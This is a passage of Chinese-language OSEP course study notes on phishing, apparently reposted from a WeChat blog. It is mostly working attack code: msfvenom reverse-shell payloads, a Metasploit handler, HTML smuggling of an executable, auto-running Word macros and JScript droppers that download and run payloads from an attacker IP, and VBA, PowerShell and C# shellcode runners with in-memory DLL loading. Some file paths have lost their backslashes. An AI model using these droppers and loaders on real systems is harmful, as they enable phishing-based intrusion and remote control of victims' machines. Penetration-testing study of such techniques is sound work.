关于笔记形式和学习方法请看OSEP学习之路 | 开篇
本篇是第一部分“钓鱼攻击”技术,笔记基本是按照教材梳理的,章节不是一一对应,因为有些内容合并后更好理解
和同学想的钓鱼技术还不太一样,教材里的这些严格来说算是钓鱼前准备工作,总结干货如下:
1-钓鱼技术
主要内容:以社工方式获取系统权限的攻击思路和方法
主要方法:以VBA(Word宏)、JS(Windows Script Host)两种方式执行payload获取shell
1.1-远程代码执行payloads
使用msf生成payloads
查看payloads列表
msfvenom -l
1.1.1-Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
1.1.2-Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
1.1.3-Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
1.1.4-PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ’ | tr -d ‘n’ > shell.php && pbpaste >> shell.php
1.1.5-ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
1.1.6-JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
1.1.7-WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
1.1.8-Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
1.1.9-Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
1.1.10-Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
1.1.11-Linux Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
1.1.12-Windows Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
1.1.13-Mac Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
1.2-接收shell
使用MSF填写payload参数进行shell的接受和管理
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z
1.3-HTML走私
直接下载
<html>
<body>
<a href="/msfstaged.exe" download="msfstaged.exe">DownloadMe</a>
</body>
</html>
改进
<html>
<head>
<title>html smuggling 1</title>
</head>
<body>
<script>
function base64ToArrayBuffer(base64){
var binary_string = window.atob(base64);
var len = binary_string.length;
var bytes = new Uint8Array(len);
for(var i = 0; i< len; i ++){ bytes[i] = binary_string.charCodeAt(i);}
return bytes.buffer;
}
var file = 'TVqQAAM...';
var data = base64ToArrayBuffer(file);
var blob = new Blob([data], {type: 'octet/stream'});
var fileaName = 'msfstaged.exe';
var a = document.createElement('a');
document.body.appendChild(a);
a.style = 'display: none';
var url = window.URL.createObjectURL(blob);
a.href = url;
a.download = fileaName;
a.click();
window.URL.revokeObjectURL(url);
</script>
</body>
</html>
继续改进
<!DOCTYPE html>
<html>
<head>
<title>html smuggling 2</title>
</head>
<body>
<h1>Example 2</h1>
<script>
function base64ToArrayBuffer(base64){
var binary_string = window.atob(base64);
var len = binary_string.length;
var bytes = new Uint8Array(len);
for(var i = 0; i< len; i ++){ bytes[i] = binary_string.charCodeAt(i);}
return bytes.buffer;
}
var file = "TVqQAAMAAAAEAAA...";
var data = base64ToArrayBuffer(file);
var blob = new Blob([data], {type: 'octet/stream'});
var filename = 'msfstaged.exe';
navigator.msSaveBlob(blob, filename);
</script>
</body>
</html>
1.4-Office钓鱼
VB宏代码
Sub MyMacro1()
Dim myLong As Long
myLong = 1
If myLong < 5 Then
MsgBox ("True")
Else
MsgBox ("False")
End If
End Sub
Sub MyMacro2()
Dim str As String
str = "cmd.exe"
Shell str, vbHide
End Sub
Sub Document_Open()
MyMacro2
End Sub
Sub AutoOpen()
MyMacro2
End Sub
Sub MyMacro3()
Dim str As String
str = "cmd.exe"
Shell str, vbHide
End Sub
Sub MyMacro4()
Dim str As String
str = "cmd.exe"
CreateObject("Wscript.Shell").Run str, 0
End Sub
执行powershell和延迟执行
Sub MyMacro3()
Dim str As String
str = "powershell IWR -uri http://192.168.203.214/msfstaged.exe -outfile msfstaged.exe"
Shell str, vbHide
Dim exePath As String
exePath = ActiveDocument.Path + ".msfstaged.exe"
Wait (2)
Shell exePath, vbHide
End Sub
Sub Wait(n As Long)
Dim t As Date
t = Now
Do
DoEvents
Loop Until Now >= DateAdd("s", n, t)
End Sub
1.5-VB中使用win32 API
生成shellcode
msfvenom -p windows/meterpreter/reverse_https lhost=<IP> lport=<PORT> exitfunc=thread -f vbapplication
注意shellcode的位数(32位)
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Sub myMacro()
Dim buf As Variant
Dim addr As LongPtr
Dim data As Long
buf = Array(...)
addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
For counter = LBound(buf) To UBound(buf)
data = buf(counter)
res = RtlMoveMemory(addr + counter, data, 1)
Next counter
res = CreateThread(0, 0, addr, 0, 0, 0)
End Sub
1.6-Phishing Pretext
代码
Sub Document_Open()
SubPage
End Sub
Sub AutoOpen()
SubPage
End Sub
Sub SubPage()
ActiveDocument.Content.Select
Selection.Delete
ActiveDocument.AttachedTemplate.AutoTextEntries("TheDoc").Insert Where:=Selection.Range, RichText:=True
End Sub
C#调用win32 api,用MessageBox测试
$User32 = @"
using System;
using System.Runtime.InteropServices;
public class User32{
[DllImport("user32.dll", SetLastError = true, CharSet= CharSet.Auto)]
public static extern int MessageBox(int hWnd, String text, String caption, uint type);
}
"@
Add-Type $User32
[User32]::MessageBox(0, "Test", "BoxTitle",0)
准备shellcode
msfvenom -p windows/meterpreter/reverse_https LHOST=<IP> LPORT=443 EXITFUNC=thread -f ps1
组装脚本
$Kernel32 = @"
using System;
using System.Runtime.InteropServices;
public class Kernel32{
[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32", CharSet = CharSet.Ansi)]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("kernel32.dll", SetLastError=true)]
public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
}
"@
Add-Type $Kernel32
[Byte[]] $buf = ...
$size = $buf.Length
[IntPtr]$addr = [Kernel32]::VirtualAlloc(0,$size, 0x3000,0x40);
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $size)
$thandle = [Kernel32]::CreateThread(0, 0, $addr, 0, 0, 0);
[Kernel32]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF")
1.7-在pwoershell中动态调用
[appdomain]::currentdomain.getassemblies() | Sort-Object -Property fullname | Format-Table fullname
以下三步:
1 - Find GetModuleHandler
2 - Load target dll
3 - Invoke target function
1.7.1-GetProcAddress
# Load system.dll
$systemdll = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') })
# Locate all the unsafe methods
$unsafeObj = $systemdll.GetType('Microsoft.Win32.UnsafeNativeMethods')
# find GetModuleHandler
$GetModuleHandle = $unsafeObj.GetMethod('GetModuleHandle')
# Use GetModuleHandler to load a dll, user32.dll
$GetModuleHandle.Invoke($null, @("user32.dll"))
# find GetProcAddress
$GetProcAddress = $unsafeObj.GetMethod('GetProcAddress')
# We have two candidate, we put them into a list and check each one.
$tmp=@()
$unsafeObj.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
# We just use the first one.
$GetProcAddress = $tmp[0]
$user32 = $GetModuleHandle.Invoke($null, @("user32.dll"))
$GetProcAddress.Invoke($null, @($user32, "MessageBoxA"))
代码组合
function LookupFunc {
Param ($moduleName, $functionName)
$assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
$tmp=@()
$assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null,@($moduleName)), $functionName))
}
$MessageBoxA = LookupFunc user32.dll MessageBoxA
$MessageBoxA
1.7.2-GetDelegateType
$MyAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')
# Get current domain
$Domain = [AppDomain]::CurrentDomain
# Define as DynamicAssembly, avoid saving to disk
# Provide Run argument, to set it as executable.
$MyAssemblyBuilder = $Domain.DefineDynamicAssembly($MyAssembly,[System.Reflection.Emit.AssemblyBuilderAccess]::Run)
# Create the content
# Create a InMomoryModule and not include symbols
$MyModuleBuilder = $MyAssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)
# Use DefineType to define a delegateType
# class (so we can later instantiate it), public, non-extendable, and use ASCII instead of Unicode
$MyTypeBuilder = $MyModuleBuilder.DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
# Then put function prototype inside this DefineType
# param1: MethodAttributes, 'RTSpecialName, HideBySig, Public', make it public and require it to be referenced by both name and signature
# param2: Calling conventions, here use standard
# param3: arguments for MessageBoxA
$MyConstructorBuilder = $MyTypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, @([IntPtr], [String], [String], [int]))
# SetImplementationFlags, choose Runtime and mangled
$MyConstructorBuilder.SetImplementationFlags('Runtime, Managed')
# Then we want to invoke the function, we should define the settings for a function
# param1:
# choose Public to make it accessible, HideBySig to allow it to be called by both name and signature
# NewSlot, and Virtual to indicate that the method is virtual and ensure that it always gets a new slot in the vtable
# param2: return type for the function
# param3: array of argument types
$MyMethodBuilder = $MyTypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', [int], @([IntPtr],[String], [String], [int]))
# SetImplementationFlags for methods as well, choose Runtime and mangled
$MyMethodBuilder.SetImplementationFlags('Runtime, Managed')
# Finally Create type
MyDelegateType = $MyTypeBuilder.CreateType()
$MyFunction = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MessageBoxA, $MyDelegateType)
$MyFunction.Invoke([IntPtr]::Zero,"Hello World","This is My MessageBox",0)
1.7.3-代码组合
function getDelegateType{
Param(
[Parameter(Position = 0, Mandatory = $true)] [Type[]] $func,
[Parameter(Position = 1)][Type] $delType = [Void]
)
$type = [AppDomain]::CurrentDomain.
DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).
DefineDynamicModule('InMemoryModule', $false).
DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate])
$type.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $func).
SetImplementationFlags('Runtime, Managed')
$type.DefineMethod('Invoke','Public, HideBySig, NewSlot, Virtual', $delType, $func).
SetImplementationFlags('Runtime, Managed')
return $type.CreateType()
}
1.7.4-最终代码
function LookupFunc{
Param ($moduleName, $functionName)
$assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].
Equals('System.dll')}).GetType('Microsoft.Win32.UnsafeNativeMethods')
$tmp=@()
$assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress"){$tmp+=$_}}
return $tmp[0].Invoke($null,@(($assem.GetMethod('GetModuleHandle')).Invoke($null, @($moduleName)), $functionName))
}
function getDelegateType{
Param(
[Parameter(Position = 0, Mandatory = $true)] [Type[]] $func,
[Parameter(Position = 1)][Type] $delType = [Void]
)
$type = [AppDomain]::CurrentDomain.
DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).
DefineDynamicModule('InMemoryModule', $false).
DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate])
$type.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $func).
SetImplementationFlags('Runtime, Managed')
$type.DefineMethod('Invoke','Public, HideBySig, NewSlot, Virtual', $delType, $func).
SetImplementationFlags('Runtime, Managed')
return $type.CreateType()
}
$lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc), (getDelegateType @([IntPtr],[UInt32],[UInt32],[UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000,0x3000,0x40)
[Byte[]] $buf = ...
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $lpMem, $buf.length)
$hThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread), (getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)
$hThread
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WaitForSingleObject), (getDelegateType @([IntPtr], [Int32])([IntPtr]))).Invoke($hThread, 0xFFFFFFFF)
1.8-使用HTA钓鱼
HTA代码
<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("cmd.exe");
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>
1.9-使用WSH钓鱼
需要对多种文件格式进行测试,需要注意的是,哪些后缀是默认有配置对应的打开程序的,比如JSE
1.10-使用JS钓鱼
生成payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.203.214 LPORT=9000 -f exe > met.exe
js代码
var url = "http://192.168.203.214/met.exe"
var Objects = WScript.CreateObject('MSXML2.XMLHTTP');
Objects.Open('GET', url, false);
Objects.Send();
if (Objects.Status == 200){
var Stream = WScript.CreateObject('ADODB.Stream');
Stream.Open();
Stream.Type = 1;
Stream.Write(Objects.ResponseBody);
Stream.Position = 0;
Stream.SaveToFile("met.exe", 2);
Stream.Close();
}
var r = new ActiveXObject("WScript.shell").Run("met.exe");
双击即可执行,也可以通过命令执行
c:windowssystem32mshta.exe xx.js
1.11将.NET binary转换成JS文件
使用工具:
https://github.com/tyranid/DotNetToJScript
DotNetToJScript命令
DotNetToJScript.exe ExampleAssembly.dll --lang=Jscript --ver=v4 -o demo.js
1.12-.NET调用win32api实现反向shell
Messagebox测试
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace ConsoleApp1
{
class Program
{
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MessageBox(IntPtr hWnd, String text, String caption, int options);
static void Main(string[] args)
{
MessageBox(IntPtr.Zero, "This is my text", "This is my caption", 0);
}
}
}
PInvoke
https://www.pinvoke.net/
生成shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.203.214 lport=9000 -f csharp
执行shellcode的代码
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace ShellcodeRunner
{
class Program
{
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("kernel32.dll")]
static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
static void Main(string[] args)
{
// Console.WriteLine("START!");
byte[] buf = new byte[510] { ... };
int size = buf.Length;
IntPtr addr = VirtualAlloc(IntPtr.Zero, (UInt32)size, 0x3000, 0x40);
Marshal.Copy(buf, 0, addr, size);
IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
// Console.WriteLine(hThread);
WaitForSingleObject(hThread, 0xFFFFFFFF);
// Console.WriteLine("END!");
}
}
}
使用WaitForSingleObject,因为我们创建新进程后,那么原来的进程主进程怎么办,所以我让他等待我的新进程结束
将上述代码加入js中
DotNetToJScript.exe ExampleAssembly.dll --lang=Jscript --ver=v4 -o runner.js
1.13-其他方法-SharpShooter
工具:
https://github.com/mdsecactivebreach/SharpShooter
msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.203.214 lport=443 -f raw -o shell.txt
python2 SharpShooter.py --payload js --dotnetver 4 --stageless --rawscfile ./shell.txt --output test
1.14-使用Powershell加载DLL
生成shellcode
msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.203.214 lport=443 -f csharp
编译DLL
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace ClassLibrary1
{
public class Class1
{
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize,
uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize,
IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr
lpThreadId);
[DllImport("kernel32.dll")]
static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
public static void runner()
{
byte[] buf = new byte[510] {...};
int size = buf.Length;
IntPtr addr = VirtualAlloc(IntPtr.Zero, (UInt32)size, 0x3000, 0x40);
Marshal.Copy(buf, 0, addr, size);
IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
WaitForSingleObject(hThread, 0xFFFFFFFF);
}
}
}
powershell加载DLL
(New-Object System.Net.WebClient).DownloadFile('http://<IP>/ClassLibrary1.dll','ClassLibrary1.dll')
$assem = [System.Reflection.Assembly]::LoadFile("c:usersadminClassLibrary1.dll")
$class = $assem.getType("ClassLibrary1.Class1")
$method = $class.GetMethod("runner")
$method.Invoke(0, $null)
无文件加载DLL
$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.43.140:9999/ClassLibrary1.dll')
$assem = [System.Reflection.Assembly]::Load($data)
$class = $assem.GetType("ClassLibrary1.Class1")
$method = $class.GetMethod("runner")
$method.Invoke(0, $null)
远程加载
$assem = [System.Reflection.Assembly]::LoadFile("\192.168.203.128shareClassLibrary1.dll")
$class = $assem.getType("ClassLibrary1.Class1")
$method = $class.GetMethod("runner")
$method.Invoke(0, $null)
2-其他技巧
2.1-开启SMB共享
在kali上操作:
/etc/samba/smb.conf
[share]
path = /home/kali/OSEP/smbshare
browseable = yes
read only = no
增加用户变更密码
smbpasswd -a kali
使用impacket
smbserver.py share . -smb2support
2.2-安装Visual Studio
安装好后,测试编译如下代码
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace Hello_World
{
internal class Program
{
static void Main(string[] args)
{
Console.WriteLine("Hello World");
}
}
}
2.3-代理Proxy
New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
$keys = Get-ChildItem 'HKU:' ForEach ($key in $keys) {if ($key.Name -like "*S-1-5-21-*") {$start = $key.Name.substring(10);break}}
$proxyAddr=(Get-ItemProperty -Path "HKU:$startSoftwareMicrosoftWindowsCurrentVersionInternet Settings").ProxyServer
[system.net.webrequest]::DefaultWebProxy = new-object System.Net.WebProxy("http://$proxyAddr")
$wc = new-object system.net.WebClient
$wc.DownloadString("http://192.168.119.120/run2.ps1")
坚持自律做最好的自己
原文始发于微信公众号(高级红队专家):OSEP | 钓鱼攻击
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论